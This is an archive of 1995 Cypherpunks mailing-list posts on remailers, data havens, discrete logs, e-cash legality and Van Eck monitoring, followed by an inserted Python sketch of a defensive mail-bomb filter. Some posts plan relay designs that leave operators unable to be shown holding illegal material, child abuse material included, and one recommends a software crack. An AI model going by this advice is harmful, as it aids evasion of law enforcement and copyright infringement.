tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 18 Jan 95 21:04:22 PST
To: cypherpunks@toad.com
Subject: Re:  Factorisation and Discrete Logs (was Re: EE Times on PRZ)
Message-ID: <199501190504.VAA03998@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: dwa@mirage.svl.trw.com (Dana Albrecht)
> Choose, at random, "a" such that gcd(a,N) = 1.
> 
> Compute x such that:
> 
>      a^x = 1 (mod N)          [ Discrete log time! ]

DH uses prime moduli, I believe.  Solving the DL problem sufficiently to
break DH may not let you solve it for composite moduli, not without
knowing the factors.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael  Conlen <meconlen@IntNet.net>
Date: Wed, 18 Jan 95 18:18:30 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SV4.3.91.950118141828.7755B-100000@xcalibur>
Message-ID: <Pine.SV4.3.91.950118210105.28469A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Jan 1995, Jonathan Cooper wrote:

> > If the authorities attempt to indict you for possessing illegal
> > information / kiddie porn / whatnot, they have to prove that you
> > interfered with the automatic redistribution process and examined the
> > contents of the submission. If you in fact did not look at the submission,
> > they would have a difficult time doing so. 
> 
>    Unfortunately I've found that the U.S. government especially can make 
> your life a living hell if you don't go along with their desires, even if 
> you're following all the laws.  Trumped-up charges.  Fake charges.  I 
> wouldn't put much past our government.

I think the worst is that the government never seems to be in the mood 
for giving your computer equipment back to you. Hiding your physical 
location, being out of the question, (old thread), all the government has 
to do is drum up suspicion and enough information for a warrant for your 
computer equipment, then you're screwed out of a system. If you had a 
system good enough to effectively handle DH's or even remailers, you're out 
of a good sum of money. 

						Groove On Dude
						Michael Conlen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 18 Jan 95 19:13:01 PST
To: cypherpunks@toad.com
Subject: JP vs Homer
Message-ID: <Pine.3.89.9501182150.A23592-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
-----BEGIN PGP SIGNED MESSAGE-----
 
  A side note:  "The ultimate hacks of Wall Street."
    Now THERE is an idea...  You think Donald Trump could see the
    usefulness of e*?  Ivan Boskey?  (sp)
 
 
To the point:
 
     JP's withdrawal, and Homer's thread point to something that I've felt
for a while:  The classification of our tools as munitions has an important
point--they should not be used by children.  A.S.R notwithstanding, (such
a person has had their childhood robbed) what we are doing is _very
serious_.  Sometimes we talk about pulling down the entire structure of our
governments and economy as if it were a Sunday afternoon parlor exercise, or
a pipe dream.  It is neither.
 
     We are on the verge of a restructuring of our society.  Cypherpunk
projects are the bleeding edge.  Implementation calls for serious,
considered efforts.  Childish behavior is not only uncalled for, it must be
anticipated and prevented, or as a minimum, found and fought.
 
 
     I have long been concerned that the remailers are far too vulnerable to 
either childish abuse or TLA attacks.  The former is reaching the stage of
threatening to swamp us, either by resource depletion, or by stigmatizing
our efforts.
 
     There is little, if anything, we can do to stop a chained, PGP'ed mail
bomb, "This is mail bomb number XXX.  Boom!"  It is therefore in our best
interest to not encourage children to send such messages in such a way.  I
believe Homer's message was erroneous for this reason.
 
     We do have considerable interest, however, in maintaining a positive
image.  Positive image is a multifaceted jewel.  We must look to preserve
it as much as possible while pursuing our goals.
 
     We are capable of controlling mail bombs, for instance, in the
following way:
 
     Take an incoming message, capture From: line.  Strip header.  MD5 body.
Add to sorted table [From: MD5(message) date].  Check for repetition of
first two fields.  If reps = 1, forward message.  If reps = 2, send message
to From:  "Possible error.  Two copies of message <message> received."  If
reps = 0 mod 5, send letter to postmaster@From:.  "Possible mailbomb or
spam.  <reps> copies of <message> received from <From:> at your site in the
past week." Clear table of entries more than a week old every midnight.
 
 
     If all remailers did this, then no matter where the net was entered,
the messages would be rejected.  And spammers/bombers would be spamming/
bombing their own postmaster.  Probably a bad idea.  If not all did it,
then add special handling to hit remailer-operator@.  This would encourage
the operator to auto-magically handle the spam-bomb himself.
 
 
     Dealing with huge files and/or TLA's is a topic for another day.
Remember:  spook@cia.gov, snitch@fbi.gov, and cracker@nsa.gov are probably
all listening, maybe even denning@aol.com.  Is it a stretch to consider
that _they_ might spam-bomb us, trying to discourage the best?
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulus are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
-----END PGP SIGNATURE-----
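
The repeat-counting table from Nathan Zook's message above, as an added example that is not part of the original post. The class and action names are hypothetical, the sample message is constructed, and two behaviours the post leaves open are assumptions: copies 3 and 4 (and other counts not divisible by 5) are dropped silently, and a sender with no domain gets no postmaster notice.

```python
import hashlib
from datetime import datetime, timedelta
from email import message_from_string
from email.utils import parseaddr

WINDOW = timedelta(days=7)   # "in the past week"


class RepeatTable:
    """Rows of (From, MD5(body), arrival time), as laid out in the post."""

    def __init__(self):
        self.rows = []

    def purge(self, now):
        """The midnight job: clear rows more than a week old."""
        cutoff = now - WINDOW
        self.rows = [r for r in self.rows if r[2] >= cutoff]

    def handle(self, raw, now):
        """Record one incoming message; return (action, address_to_notify)."""
        raw = raw.replace("\r\n", "\n")
        headers, _, body = raw.partition("\n\n")          # strip header
        # From: is whatever the sender claims; the post keys on it as-is.
        claimed = message_from_string(headers + "\n\n").get("From", "")
        sender = parseaddr(claimed)[1].lower()
        # MD5 is only a duplicate fingerprint here, as the post specifies.
        digest = hashlib.md5(body.encode("utf-8")).hexdigest()
        self.rows.append((sender, digest, now))

        cutoff = now - WINDOW
        reps = sum(1 for s, d, t in self.rows
                   if s == sender and d == digest and t >= cutoff)
        if reps == 1:
            return ("forward", None)
        if reps == 2:
            return ("warn_sender", sender)
        if reps % 5 == 0 and "@" in sender:
            return ("warn_postmaster", "postmaster@" + sender.rpartition("@")[2])
        return ("drop", None)          # assumption: other repeats are discarded


# Constructed sample input.
SAMPLE_BOMB = (
    "From: Mallory <mallory@example.org>\n"
    "Subject: hello\n"
    "\n"
    "This is mail bomb number XXX.  Boom!\n"
)


def demo():
    """Feed six identical copies through one table and return the actions."""
    table = RepeatTable()
    start = datetime(1995, 1, 18, 12, 0)
    return [table.handle(SAMPLE_BOMB, start + timedelta(minutes=i))
            for i in range(6)]


if __name__ == "__main__":
    for action in demo():
        print(action)
```

Because the header is stripped before hashing, changing only the Subject line does not reset the count, while changing one byte of the body does.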





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Wed, 18 Jan 95 18:25:16 PST
To: GIETV@ns.rhodes.edu
Subject: Re: Electronic cash illegal?
Message-ID: <9501190223.AA07519@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> Within the United States (and most other sovereign states) Hal Finney is
> correct to point out that the power to print currency is reserved to the
> government.  I would think that e-cash is a currency and therefore illegal
> TO ISSUE WITHIN the geographical (legal) domain of the US.  

He didn't say it was illegal to print private banknotes, just taxable.
Anybody can issue paper or metal tokens or whatever - the difference
with government-issue currency is that they can pass laws saying you
must accept it as payment for debts, even though your contract
specified repayment in real money instead of private bogons
like green paper IOUs or lightweight impure-metal coins with
politician's pictures on them.

As far as I know, the legal definition of a "dollar" in the US is still a
certain weight of silver, and payment in silver legally satisfies debts;
under current silver prices, that probably costs more than a 
$1 US Federal Reserve Note, so nobody bothers.


		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 18 Jan 95 18:32:30 PST
To: Ben.Goren@asu.edu
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <v02110100ab435e5f6310@[129.219.97.131]>
Message-ID: <Pine.SOL.3.90.950118212506.8708C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm not familiar with all aspects of this but one thing argues in favor
of hoping this becomes a test case:  Scientologists are probably more out of 
favor than cypherpunks.  

Brad


On Wed, 18 Jan 1995 Ben.Goren@asu.edu wrote:

> At 4:33 PM 1/18/95, Paul J. Ste. Marie wrote:
> >[. . .] As long as
> >some piece of info is considered to be a thought-crime, everyone who accepts
> >info from a wide range of sources is at risk.
> 
> We might have a test case right now for part of that idea--the
> Scientologists. They're essentially claiming that the various newsgroups
> should be shut down because somebody put thoughtcrime on them. I would
> posit that the operator of any automated data transmission/massaging
> service is not responsible for the data that passes through her equipment.
> Consider, for example, if I used a bang path to route an illicit email note
> through, say, apple.com. Does that make Apple Computer responsible for what
> I send?
> 
> Tying in with some of Eric's comments, this could be viewed as a
> fundamental flaw in the 'net: it's the sender, generally, who initiates and
> controls the connection, not the recipient. We could view this as an
> advantage: how can you blame me for what somebody else does to my computer
> without my knowledge, especially if I have no way to stop it short of
> getting off the 'net completely?
> 
> >> ... The service could even be advertised as a different form of timestamping
> >>(or notarizing). Not only do you get the file back signed, but you get it
> >>back encrypted and signed. ...
> >
> >That would still be a useful service, however, but it does transfer the risk
> >from the DH operator to the encryptor.  Since he isn't leaving evidence on a
> >hard drive, his window of vulnerability is somewhat less.
> 
> Less to nonexistent. If no human sees it on the encrypting site, no human
> can be responsible for it. "They" would have to ban the service outright,
> or try to prove that you knew that your site would be used for illicit
> purposes. If putting a warning to not export crypto software on an ftp site
> is sufficient protection--and, judging from the number of sites which do no
> more than that, it is--then a simple statement that the service is not to
> be used for any illegal purpose should do fine here.
> 
> >    --Paul J. Ste. Marie
> >      pstemari@well.sf.ca.us, pstemari@erinet.com
> 
> b&
> 
> --
> Ben.Goren@asu.edu, Arizona State University School of Music
>  Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Wed, 18 Jan 95 18:35:04 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <9501190233.AA07621@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> 	I could write a procmail recipe and a script in about an hour to
> automatically secret-share-split and redistribute the incoming submission.
> If the authorities attempt to indict you for possessing illegal
> information / kiddie porn / whatnot, they have to prove that you
> interfered with the automatic redistribution process and examined the
> contents of the submission. If you in fact did not look at the submission,
> they would have a difficult time doing so. 

The problem with a procmail script, unlike the ugly on-the-fly
SMTP-like splitting method I proposed, is that the suspicious message
is in your mail system, intact, and if they nail you before
you can dispose of it, they can prove you had it.
(Even though procmail does stuff quickly, sendmail still
accumulates the material before delivering it, doesn't it?)

They still have to prove that there's something illegal or
forfeiture-supporting about the way you possessed the message,
but by then you're hauled into court and your computer is stolen.
The Feds argued in the Steve Jackson Games fiasco that intercepting
unread mail in mailboxes is different than intercepting it in transit,
and while we can hope that will be overturned, it's better not to
be the guinea pig.

If your machine never has more than a few bits of the message,
they can't catch you in possession of the message - they can only
argue that bits of it flowed through your machine, and that's
much harder to build a case on, and given the abuse the judge
gave the Bad Guys in the SJG case, it's probably easy to prevent
them from keeping your machine as evidence, or at least get it back.

Your paranoia may vary....

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Wed, 18 Jan 95 18:56:30 PST
To: jamesd@netcom.com
Subject: Re: Scientologys Attempts
Message-ID: <9501190254.AA07887@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > > who has the authority to remove alt. groups?

jamesd writes:
> Anybody has the power.  Nobody has the authority.

More precisely, anybody has the power to send a rmgroup message,
just like anybody has the power to send a cancel message.
Aside from etiquette and ethics, the question is 
whether most of the news servers out there will respond to them,
which is a local decision.

The last time I ran a news server was in B News days, so your mileage
may vary, but responses to newgroup and rmgroup messages can be
turned on and off.  I used to leave them turned on; not only did
new groups appear on my system without manual intervention,
but the Great Renaming took care of itself automatically on my box.

> [...] This is a classic case of net abuse.
Yep.  rmgroup wars happen occasionally on the net,
usually about alt.joe.newuser.die.die.die and other spam groups
run by (or about) people with more spare time than taste.
The difference here is that it's part of an organized group-sponsored
censorship attempt, rather than an individual squabble,
so it retains some degree of classicity.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Wed, 18 Jan 95 20:38:55 PST
To: asgaard@sos.sll.se (Mats Bergstrom)
Subject: Re: copyright and data havens
In-Reply-To: <Pine.HPP.3.91.950119000101.4197A-100000@cor.sos.sll.se>
Message-ID: <950118.222008.4k2.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, asgaard@sos.sll.se writes:

>            (by the way, how long might it take to IDEA-encrypt a 2 MB
> .zip file?  I never tried)

Me, neither.  Let's find out....


[1] d:\doom>dir tt.zip

 Volume in drive D is unlabeled      Serial number is 0000:13FD
 Directory of  d:\doom\tt.zip

tt.zip        2292723   1-18-95  22:06
   2,292,723 bytes in 1 file(s)          2,293,760 bytes allocated
   4,853,760 bytes free

[1] d:\doom>timer^pgp +armor=off +compress=off +textmode=off -c tt.zip ^ timer
Timer 1 on: 22:16:16
Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses.
(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94
Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
Distributed by the Massachusetts Institute of Technology.
Export of this software may be restricted by the U.S. government.
Current time: 1995/01/19 04:16 GMT

You need a pass phrase to encrypt the file.
Enter pass phrase:
Enter same pass phrase again: Just a moment...
Ciphertext file: tt.pgp
Timer 1 off: 22:18:42  Elapsed: 0:02:26.05


'+textmode=off' is probably overkill, since PGP recognizes the non-text
content.  But my config.txt has armor and compress turned on.
Compressing almost doubled the time to encrypt, and armor gave me 39
*.asc files.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 18 Jan 95 19:40:10 PST
To: bill.stewart@pleasantonca.ncr.com    +1-510-484-6204)
Subject: Re: Electronic cash illegal?
In-Reply-To: <9501190223.AA07519@anchor.ho.att.com>
Message-ID: <9501190336.AA12782@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> As far as I know, the legal definition of a "dollar" in the US is still a
> certain weight of silver, and payment in silver legally satisfies debts;
> under current silver prices, that probably costs more than a 
> $1 US Federal Reserve Note, so nobody bothers.

Uhh, no, US currency does not have any backing.  I believe it was
Nixon who stopped it, possibly even earlier than him.  There _used_ to
be Gold- and Silver-backed dollars, but no longer.

The US dollar is backed by trust alone, today.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 18 Jan 95 20:03:06 PST
To: dwa@mirage.svl.trw.com (Dana Albrecht)
Subject: Re: Factorisation and Discrete Logs (was Re: EE Times on PRZ)
In-Reply-To: <9501190339.AA20854@mirage.svl.trw.com>
Message-ID: <9501190357.AA12988@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Comments, anyone?

You are right...  Given talks I've had with Brian LaMacchia, who broke
a version of "Secure SunRPC" (a 192-bit prime), he claims that the
difficulty in reducing a D-L problem is about the same amount of
computation to factorize an RSA modulus of approximately the same
size..

So, within napkin-computation, you are correct.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 23:57:21 PST
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <m0rUn1t-0009tFC@sdwsys>
Message-ID: <199501190756.XAA08643@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephen D. Williams wrote:

> Bzzzt....  Your error correction is working overtime...
> 
> That's Len Rose, formerly with Pagesat, currently with barrnet.
> His offense, BTW, was basically giving the source to ATT login.c
> to a college kid...  Documented somewhat poorly in 'The Hacker Crackdown',
> Bruce Sterling.

Enough already! This is the seventh or eighth such correction that's
been sent to me, some of them also sent to the list.

I understand that errors get picked up promptly by all you eagle-eyes,
but enough already.

Thanks,

--Tim May






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 18 Jan 95 21:16:33 PST
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: TEMPEST
Message-ID: <9501190507.AB17284@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 PM 1/18/95, Timothy C. May wrote:
> ... And if nothing is seen with our $10K of equipment, what does this
>prove against an attacker who can easily afford to spend 20 or 30
>times that amount to equip a van?
>
>Cypherpunks have been exploiting technology that is comparatively
>_much cheaper_ and which changes the equation.
>
> ... In general, for reasons many of us have written about here before, and in
>particular, because I think spending $10,000 to prove what we already
>know--that RF emissions can be detected and demodulated--is a poor use
>of money. That $10K would go a long way to getting PGP Phone finished. ...

I'm not sure how encryption changes the equation if that van on the street 
can read the data off your screen and/or printer.  Just as cryptanalysis is 
a necessary component of good cryptography, some sort of VanEck analysis 
would seem to be required in order to evaluate the utility of methods to 
block it.

What exactly would one need to do to block Van Eck monitoring?  I've seen 
computer rooms that were completely lined with copper sheathing.  Is it 
really necessary to go to that extent?  Will aluminum foil and power line 
conditioning handle it?  You can't really tell how effective 
counter-measures are unless you have some way to see what reduction in 
emitted signal they provide.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 18 Jan 95 21:18:16 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <199501190516.AAA09260@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:

| rishab@dxm.ernet.in wrote:
| 
| > Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for
| > anon-remailers (which exist today on Sameer's c2.org blind server) and
| > data havens. I haven't bothered to hunt for Lance's address, which is not
| > given, but really I thought someone as prominent a SysLawyer as him would
| > be clued in. Nor have I found the time to send WIRED a letter. 
| 
| First, I want to know how Rishab, in India, gets "Wired" so early (or
| why I, right next to Silicon Valley, get it so late). He's mentioned
| the February issue twice now, and all I have is the January "White
| Album."

	He doesn't have to contend with the USPS?   (My copy arrived
today, quite beat up, and missing most of its white envelope.  Sigh.)

| Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
| (?). When I met him a couple of years ago, he'd just gotten out of

	You're thinking of Len Rose, not Lance Rose.  (Assuming this
is the L. Rose who features in The Hacker Crackdown.)


	Regarding Rishab's points about the article, I think it's a
useful fantasy.  Let Lance think that net.cops will win, until the
reality proves otherwise.  At least he doesn't call for banning
remailers.


Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 01:15:06 PST
To: cypherpunks@toad.com
Subject: The Remailer Crisis
Message-ID: <199501190914.BAA19681@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't think I've used "crisis" in a thread I started, so this tells
you what I think.

The remailers are stagnating, only very slowly adding important
features, and the number is not growing...in fact, it's been
shrinking.

This, as the remailers are under attack. Editorialists are railing
against the dangers of anonymity and remailers, and the "Church of
Scientology" is threatening lawsuits against remailer operators unless
they block certain newsgroups. (Lots of issues, clever workarounds
proposed, etc.)

Now whether or not the Church of Scientology, or RSADSI (for the RC4
code remailing), or anyone else could legally _win_ such a case is not
the issue. Not many remailer operators would be able to mount a
defense...they are not, frankly, folk heroes as Zimmermann is--and
even PRZ is struggling to raise money. Maybe the EFF (ugh) would leap
into the fray, but I doubt it. Nope, I fear that the pressures that
have driven several remailers to halt operation are just the tip of
the iceberg. (Some remailers have quit because of words from their
sysadmins, semi-threatening conversations with Brad Templeton--Hi,
Brad!--, and so on. Real letters from real lawyers would have a
profoundly more chilling effect.)

We've debated this stuff many times, but the numbers of remailers are
shrinking. Raph Levien summarized the situation nicely in a post to
alt.anon-server: 

"We're down to fifteen remailers now, many of which are unreliable. I
would say the remailer net is not in good shape right now.
Fortunately, I know of a number of plans to bring new remailers up, as
well as restoring old ones."

(I hope Raph can share with us soon what some of the plans are, unless
he fears revealing this will aid our opponents.)

I could see the whole remailer system imploding. A few threatening
letters, especially if sent by real lawyers, could demolish the few
U.S. sites. And with the Netherlands toying with proposals to ban or
limit private encryption, having Holland as the main remaining host for
remailers would be rather precarious.

We need lots more remailers, in many more countries.

What can be done?

* We need to get the number of "solid" remailers up from the current
dozen or so up into the _hundreds_.

* I favor separating the "account that remails" from the "owner of the
site," as I have argued in vain in the past. (Example: a willing site
gives out or sells many accounts...each is legally separate, and each
must be legally challenged. My longer posts dealt with this.)

(The owner of the site/machine can take a "hands off" attitude toward
what his customers are doing in their accounts. This doesn't stop
pressures from being applied, but it slows them down, and (probably)
better insulates the owner from legal charges.)

* Traffic needs to be increased. Remailers should probably go to
constant padding traffic, to do this. Exhorting end-users to use
remailers more won't be enough.

* More offshore sites are needed. So far, only Canada and the
Netherlands are offshore hosts (and Canada is effectively part of the
U.S.). Some sites in Russia would be dramatic. Ditto for Asia, South
America, etc.

* The whole issue of "remailer businesses," with all the usual issues
of digital postage, stamps, coupons, etc, has to be resolved. That is,
we need to get some movement here. Most remailers are run as projects
by students on machines they don't control, or that they can be
pressured on, or with a commitment to stay in business that will
evaporate too easily. A business, with business responsibilities, is
usually a more stable solution. 

I think we need to set some rough targets and brainstorm on how to get
to them.

For example, the Linux mavens could tell us if Linux-based remailer
boxes could be hung on dedicated connections to The Little Garden
network, as a specific example. A "black box remailer" such as several
folks have suggested (Chaum (in 1981), me, Eric Hughes, others) might be
buildable for under a grand. We could ask here for contributions, and
might even raise this amount of money. Then each of us who contributed
could have "accounts," maybe several of them. Imagine 100 or more
"remailers" all on this one machine--I'm deliberately ignoring the
security issue for now. Little Garden has stated categorically that
they will not tell users what they can or can't do with their machines
(though I can think of some cases where they might have to, as with
spamming, etc.). Anyway, you can see where I'm headed.

My big fear is that the one really major achievement of the
Cypherpunks group, the remailers, are not increasing in number and
could be knocked out all too easily with some legal attacks.

It's time to get cracking on this crisis.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 18 Jan 95 17:45:03 PST
To: cypherpunks@toad.com
Subject: copyright and data havens
In-Reply-To: <gate.ms64yc1w165w@dxm.ernet.in>
Message-ID: <Pine.HPP.3.91.950119000101.4197A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in wrote:

> factories). It's not going to be easy to find a country more willing and
> able to ignore international copyright law (Berne Convention etc) than China;
> however, despite howls of protest even China is likely to knuckle down 
> eventually. What may be likely is distributed piracy markets, such as 

In the foreseeable future (10 years?) there will exist jurisdictions that,
even after signing this or that convention, will be more or less lax
about pursuing violators. Thus I still believe, despite China's awaited
submission, that the Internet and 28.8 modems (and abundance of disk space)
are real threats to holders of copyright who want to protect every penny.

Encryption (by the way, how long might it take to IDEA-encrypt a 2 MB
.zip file? I never tried) will make it practically impossible to find
and prosecute at least private copyright abuse. They won't use thumb-
screws to obtain the key to your SecureDrive just on suspicion of
infringement (except possibly in Singapore). The present situation,
as we all know, is that few people are willing to pay for such software
as games if they can get a (cracked) version for free. I think this
attitude will expand to most software. The real war will be fought
between protectors and crackers (since it is usually not convenient
to export an opened, installed version to another system - and more
so the bigger and directory-spreading the program is). Actually, a
sort of data haven for cracks already exists. If you live in a
jurisdiction where cracks are illegal to advertize (let alone use)
they can be hard to find on your local BBS, but with an Internet feed
(or long distance modem calls) it's no problem at all. (For those
who don't believe in the shareware concept I recommend the Norwegian
nag-eliminator 'Buster' - although you need the registered version
for the latest versions :-)

Mr La Macchia got caught. How many didn't? Look at the IRC Undernet:
wArEz-bots all over the place - and I bet the net.cops are lagging
in bot comprehension (unfortunately, so am I...). And there is talk
about this Secure-IRC.

Mats
    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 18 Jan 95 23:52:52 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <m0rUn1t-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain



...
> Album."
> 
> Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
> (?). When I met him a couple of years ago, he'd just gotten out of
> jail and was working for the satellite Usenet distribution company
> (whose name I don't recall, and who I've heard less of than I might've
> expected to, subjunctively speaking).

Bzzzt....  Your error correction is working overtime...

That's Len Rose, formerly with Pagesat, currently with barrnet.
His offense, BTW, was basically giving the source to ATT login.c
to a college kid...  Documented somewhat poorly in 'The Hacker Crackdown',
Bruce Sterling.

> In any case, there a zillion odd opinions on the Net of a Million
> Lies. Most of them will vanish without a trace. That's comforting.
> 
> --Tim May

Now, my name is one that really should cause collisions...

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Thu, 19 Jan 95 01:25:07 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: remailer security
In-Reply-To: <Pine.HPP.3.91.950117202620.25204C-100000@cor.sos.sll.se>
Message-ID: <Pine.3.89.9501190333.B17770-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Sorry I'm a tad late. This time I got axed for just two groups.
C2.org's WWW page doesn't, but only sameer knows for sure.
And you might have fun looking at the "I thought you should see it
first", in news.admin.policy  Feel free to post it anywhere you 
like as anonymously as you like. There are lots of CP refs in it, 
and if I don't do the reposting, I can't get in trouble.

Now I've got to catch up reading & fixing WWW pages, and I'll link every
WWW ref I see on this list in a day or two. Thanks, Carol Anne
 
Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com      http://www.c2.org/~carolann       carolann@c2.org
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM

On Tue, 17 Jan 1995, Mats Bergstrom wrote:
> multiple chaining for the lazy, though: C2 lets you pick the chained
> sites by clicking on a web-page (but does it encrypt??).
> 
> Mats 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Thu, 19 Jan 95 01:48:32 PST
To: yusuf921@uidaho.edu (Syed Yusuf)
Subject: Re: FBI and BLACKNET
In-Reply-To: <Pine.HPP.3.91.950118195153.6655E-100000@goshawk.csrv.uidaho.edu>
Message-ID: <m0rUtU0-0002GhC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> On Tue, 17 Jan 1995, Craig Hubley (I) wrote:
> 
> > Regarding BlackNet, I am not sure that they are not *run* by the FBI,
> > or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental 
> > entity. 
> 
> The more I think about it the more this theory makes sense. I know 
> how they _could_ have traced me but this doesn't explain all their other
> "leads" they are following up on and he seemed to imply there were many.
> 
> >>> Not to mention entrapment is their MO. <<<
> 
